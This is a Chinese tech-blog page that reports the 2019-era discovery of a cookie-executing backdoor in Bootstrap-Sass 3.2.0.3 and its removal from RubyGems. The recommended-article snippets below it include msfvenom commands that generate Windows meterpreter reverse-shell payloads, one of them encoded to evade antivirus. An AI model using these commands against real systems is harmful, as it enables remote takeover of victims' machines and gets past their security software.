流行 Ruby 库曝出恶意后门代码,作者未知

最新推荐文章于 2022-05-16 15:05:15 发布
最新推荐文章于 2022-05-16 15:05:15 发布
阅读量84 收藏
点赞数
文章标签: ruby ui

开发四年只会写业务代码,分布式高并发都不会还做程序员?  hot3.png

流行的 Ruby 库 Bootstrap-Sass 曝出后门代码。

Bootstrap-Sass 是一个流行的 Ruby UI 框架,它为开发人员提供了一个 Sass 版本的 Bootstrap。据 ZDNet 的报导,上周三,开发者 Derek Barnes 在该库 3.2.0.3 版本中发现后门代码,这一小段具有恶意性质的代码如上图所示,它嵌入 Ruby 或 Ruby on Rails 之后,会加载一个 cookie 文件并执行其内容。   

据统计,虽然 Bootstrap-Sass 的安装量达到 2800 万,但是此后门版本仅有 1477 次安装,因为该库的最新版本是 3.4.1,而很少有开发者在使用旧版本分支,这一点提供了有效的安全保障。

报告公开的同一天该后门已经从 RubyGems 中删除,Bootstrap-Sass 团队还撤销了对 RubyGems 的访问权限,因为开发人员认为他们的帐户遭到入侵并被用来推送恶意代码

此外,RubyGems 和 GitHub 上也发布了 Bootstrap-Sass v3.2.0.4 版本,完全删除了后门的相关内容。

weixin_33946020
关注
网络安全方向相关课题和材料
学-> 思->用
10-30 1170
搜集大量网络安全行业开源项目一个是关注互联网企业/团队的安全开源项目,经企业内部实践,这些最佳实践值得借鉴。一个是来自企业安全能力建设的需求,根据需求分类,如WAF、HIDS、Git监控等。这个收集是一个长期的过程,我在GitHub创建了这个项目,专门用来收集一些优秀的甲方安全项目。还有很多很好的免费开源项目可供选择,下面列出的还只是其中很少的一部分,我将持续更新这个项目,欢迎Star。
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
热门推荐
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
包含已知漏洞的开源代码被广泛使用
weixin_33739541的博客
06-02 97
企业在大量使用开源代码,但在使用开源代码时他们很少对其进行安全检查,一个不可避免的结果是他们的软件项目使用的开源组件包含了已知的漏洞。提供源码托管服务的 Sonatype 公司估计,80%到90%的企业代码实际上是由开源组件构成,是从公开代码直接导入。Sonatype分析了3000家机构的超过2.5万企业应用,发现一家企业每年下载了5000个不同的开源...
恶意代码分析实战——恶意程序后门
aming小老弟
02-06 1018
QQ 1274510382 Wechat JNZ_aming 商业联盟 QQ群538250800 技术搞事 QQ群599020441 解决方案 QQ群152889761 加入我们 QQ群649347320 共享学习 QQ群674240731 纪年科技aming 网络安全 ,深度学习,嵌入式,机器强化,生物智能,生命科学。 叮叮叮:产品已上线 —>关注 官方-微信公众号——济南纪年信息科技有限公司 民生项目:商城加盟/娱乐交友/创业商圈/外包兼职开发-项目发布/ 安全项目:态势感..
某ssh后门试用
weixin_30385925的博客
04-23 319
在获取linux的root权限之后,虽然可以ssh连进去,但是可否长期进行控制呢?这里就涉及到ssh后门的问题了。在这里,我大致试用了一下一个比较老但是稳定的ssh后门,算是作个记录。后续我会翻译一篇老外用python写的ssh后门。好了,我会在虚拟机中对ssh后门做一个演示,最后我会放出下载到的后门程序。 在这里,我使用安装的Kali1.1.0_32来进行试验。...
木马大全
weixin_43058402的博客
08-31 919
木马大全
Metasploit渗透测试实战:利用漏洞植入多个隐蔽后门
Metasploit包含丰富的模块,支持从信息收集、漏洞分析到漏洞利用等多个阶段的渗透测试工作。 Metasploit框架的主要组成部分包括:模块、Payload、Encoder、Nops、Exploit和Auxiliary等。用户可以根据实际需求选择...
7. 利用Metasploit实现远程代码执行
# 1. Metasploit简介 ## 1.1 Metasploit概述 Metasploit是一个开源的渗透测试框架,由Rapid7公司维护。它提供了强大的工具和资源,用于开发、测试和执行针对计算机系统的安全漏洞的攻击。Metasploit旨在帮助安全...
网络安全专业名词解释
aixmmmlll的博客
05-16 3899
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
木马技术
weixin_30376163的博客
10-23 688
本文参考老书《木马技术揭秘与防御》 #0x00 国内木马历史 97年时,网络尚未在国内普及,木马是当时少数人手里的高科技,那时的木马主要来自国外的BO和SubSeven,直到国产木马冰河出现 才标志国内用户迎来网络木马混沌时代。00年用户对电脑防护意识毫无概念,防火墙又仍在探索和发展,使得冰河木马极其容易渗透进毫 无防备的电脑,许多人也就靠冰河入了门。这个时代的木马缺乏自...
java ruby_从Java到Ruby:试点策略
cunfu6353的博客
07-09 218
java ruby 现在,许多开发人员都知道Ruby on Rails是当今最重要的开源项目之一。 增长背后的引擎-高生产力-在具有相似市场份额的框架中是无与伦比的。 虽然其他框架的生产力令人印象深刻,但是没有其他框架能够将技术创新和市场份额相结合。 现在,Rails社区贡献了大量的插件(称为Gems),书籍(今年有10本书),培训,大型会议和令人印象深刻的在线资源。 随着Rails的轰动,即...
MSF木马的简单利用
god_Zeo的安全博客
06-06 1348
刚刚试了下永恒之蓝,看到有人用木马,也补一下后面的其他 环境和那一片的一样 msfvenom模块,首先生成.exe木马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.77.0.109 lport=4443f exe >/root/1.exe 1.exe 就是木马 要把这个用各种方法去受害机运行 2. 输入msfconso...
一次被入侵和删除木马程序的经历(转)
极客海哥
11-21 3390
首先剧透一下后门木马如下: (当然这是事后平静下来后慢慢搜出来的,那个时候喝着咖啡感觉像个自由人) 木马名称 Linux.BackDoor.Gates.5 http://forum.antichat.ru/threads/413337/ 首先是下午14点左右有几台服务器出现流量超高,平时只有几百M的流量,那时候发现流量上G了,达到这个量第一感觉就是遭受了DDOS流量攻击
木马的伪装与免杀
Websec
04-19 9831
0x01:我们依靠msf生成简单的shellcode免杀msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform LHOST=XXX LPORT=XXX -e x86/shikata_ga_nai -i 12 -b '\x00\' PrependMigrate=true PrependMIgrateProx=svchost.exe ...
特洛伊木马 (计算机木马程序)
丿灬安之若死
07-27 1万+
特洛伊木马目前一般可理解为“为进行非法目的的计算机病毒”,在电脑中潜伏,以达到黑客目的。 原指一希腊传说。在古希腊传说中,希腊联军围困特洛伊久攻不下,于是假装撤退,留下一具巨大的中空木马,特洛伊守军不知是计,把木马运进城中作为战利品。夜深人静之际,木马腹中躲藏的希腊士兵打开城门,特洛伊沦陷。后人常用“特洛伊木马”这一典故,用来比喻在敌方营垒里埋下伏兵里应外合的活动。现在有的病毒伪装成一个实用工具...
你以为看到了软件的源码,就意味着没有后门吗?关于开发环境安全那点儿事儿
cowcomic的专栏
12-18 3603
废话不多说,先看两个新闻 吃瓜群众带你了解 NMP 包 event-stream 被植入比特币后门的来龙去脉 “微信勒索病毒”全纪实:打扰了,我只是病毒界的杨超越 第二篇挺长的,先帮总结一下,各位看官有时间可以再慢慢看,挺有意思,可以当看小说打法时间 第一篇 Nodejs生态圈中一个重要的项目event-stream由于作者经历有限,就把开发维护的工作转让给了另一个人 结果这个人在这个项目里偷偷...
RGen:Ruby领域的建模与代码生成框架
"RGen是基于Ruby的建模和代码生成框架,允许以Ruby的方式进行建模,并且具有元模型定义、模型转换和代码生成的功能。受到oAW框架的启发,RGen的核心特色在于使用Ruby语言本身来定义元模型、模型转换规则以及生成代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值